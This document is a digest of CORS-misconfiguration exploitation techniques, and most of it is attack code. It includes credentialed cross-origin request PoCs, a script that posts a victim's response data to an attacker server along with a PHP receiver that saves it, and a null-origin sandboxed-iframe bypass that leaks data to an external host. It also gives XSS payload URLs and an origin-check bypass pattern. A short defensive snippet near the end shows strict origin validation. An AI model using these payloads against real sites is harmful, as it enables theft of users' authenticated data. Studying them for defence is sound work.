CORS vulnerability exploitation techniques (digest)
1. Much like CSRF (cross-site request forgery): send the victim a phishing link and read their sensitive data through a credentialed cross-origin request.
PoC:

```html
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
<div id="demo">
  <button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  // credentialed request: the browser attaches the victim's cookies
  xhttp.open("GET", "https://target.com/info/", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
</center>
</body>
</html>
```

When the user clicks the button, the response body is shown in an alert.

The line `document.getElementById("demo").innerHTML = alert(this.responseText);` only pops up the response. You can also go after cookie-protected data, including the case where the cookie is HttpOnly and JavaScript cannot read it directly:
```html
<!DOCTYPE html>
<html>
<h1>cors exploit</h1>
<script type="text/javascript">
function exploit() {
  var xhr1;
  var xhr2;
  if (window.XMLHttpRequest) {
    xhr1 = new XMLHttpRequest();
    xhr2 = new XMLHttpRequest();
  } else {
    xhr1 = new ActiveXObject("Microsoft.XMLHTTP");
    xhr2 = new ActiveXObject("Microsoft.XMLHTTP");
  }
  xhr1.onreadystatechange = function() {
    if (xhr1.readyState == 4 && xhr1.status == 200) {
      var datas = xhr1.responseText;
      // forward the response body to the attacker-controlled server
      xhr2.open("POST", "http://192.168.1.2/test.php", true);
      xhr2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      xhr2.send("z0=" + escape(datas));
    }
  };
  xhr1.open("GET", "http://192.168.1.1/index.php", true);
  xhr1.withCredentials = true;
  xhr1.send();
}
exploit();
</script>
</html>
```

The receiving script on the attacker-controlled server, test.php:

```php
<?php
$file = fopen("secret.html", "w+");
$res = $_POST['z0'];
fwrite($file, $res);
fclose($file);
?>
```

2. Chaining an XSS vulnerability with the CORS misconfiguration, for the case where the cookie is HttpOnly and JavaScript cannot read it
PoC:

```javascript
function exploit() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.status == 200) {
      alert(this.responseText);
      document.getElementById("demo").innerHTML = this.responseText;
    }
  };
  xhttp.open("GET", "http://192.168.1.1/index.php", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
exploit();
```

Exploitation:

```
http://192.168.1.1/index.php?<script>function%20cors(){var%20xhttp=new%20XMLHttpRequest();xhttp.onreadystatechange=function(){if(this.status==200){alert(this.responseText);document.getElementById("demo").innerHTML=this.responseText}};xhttp.open("GET","http://192.168.1.1",true);xhttp.withCredentials=true;xhttp.send()}cors();</script>&form_cartes=73&iframestat=1
```

As before, combine this with the code above to send the data to your own server.
3. Bypassing allowlist-based protection
`Origin: null`: as above, check whether the server accepts a null origin.
If it does, a cross-origin request from a sandboxed iframe bypasses the allowlist.
PoC:

```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
        src='data:text/html,<script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open("get", "https://vuln.com", true);
  req.withCredentials = true;
  req.send();
  function reqListener() {
    location = "https://your.com/l?get=" + this.responseText;
  }
</script>'></iframe>
```

4. Case studies
1) SEMrush CORS misconfiguration
Request one of SEMrush's API endpoints with an Origin header set to the attacker's server:
The response body is the user's sensitive information. Note that the returned Access-Control-Allow-Origin is the attacker's server, which means the system has a CORS misconfiguration.
Next, build an HTML file and lure the victim into clicking it:
After the click, the page pops up the victim's sensitive information:
Changing the reqListener() function to
```javascript
location = '//attacker.net/log?key=' + this.responseText;
```
sends the sensitive data to the attacker's server.
2) XSS on a redacted subdomain + CORS misconfiguration
Similar to the case above, except that the accepted Origin is redacted and its subdomains: `Origin: evil.redacted.com`. To exploit this, an XSS vulnerability must be found on a subdomain and used to issue the request. An XSS was eventually found on banques.redacted.com:
```
https://banques.redacted.com/choice-quiz?form_banque="><script>alert(document.domain)</script>&form_cartes=73&iframestat=1
```
Replace the alert with a CORS request:
The final PoC is:
The sensitive data is retrieved successfully:
3) Bypass techniques
Bypasses commonly use a PoC of the following form:
```
http://www.target.local{.<your-domain>/cors-poc
```
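As an added example (not from the original post), the server-side origin check that the `null` origin and `target.local{.<your-domain>` bypasses above rely on, next to a strict allowlist check that defeats them. It is written for Node.js; the hostnames `target.local`, `evil.com` and the `ALLOWED_ORIGINS` list are constructed.

```javascript
// Trusted origins (constructed). Compared by exact match, never by prefix.
const ALLOWED_ORIGINS = new Set([
  "http://www.target.local",
  "https://www.target.local",
]);

// Weak check: the kind of validation this post's bypasses defeat. It echoes the
// "null" origin (sandboxed iframe / data: URL) and trusts any Origin value that
// merely *starts with* the trusted host, so "http://www.target.local{.evil.com"
// and "http://www.target.local.evil.com" both pass.
function weakOriginCheck(origin) {
  if (origin === "null") return true;
  return typeof origin === "string" && origin.startsWith("http://www.target.local");
}

// Strict check: reject missing/"null" origins, parse the header as a URL,
// require the raw value to equal its canonical origin (so paths, queries,
// userinfo or stray characters cannot ride along), then exact-match the list.
function strictOriginCheck(origin) {
  if (typeof origin !== "string" || origin === "null") return false;
  let url;
  try {
    url = new URL(origin);
  } catch (e) {
    return false; // not a syntactically valid origin
  }
  if (url.origin !== origin) return false;
  return ALLOWED_ORIGINS.has(url.origin);
}

// Headers for a credentialed CORS response. An arbitrary Origin is never
// echoed; when the check fails no Access-Control-Allow-Origin is sent at all.
function corsHeaders(origin) {
  if (!strictOriginCheck(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin", // keep caches from serving one origin's ACAO to another
  };
}
```

Logging every request whose Origin fails `strictOriginCheck` but passes `weakOriginCheck` is a cheap way to spot probing for exactly these bypasses.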
Summary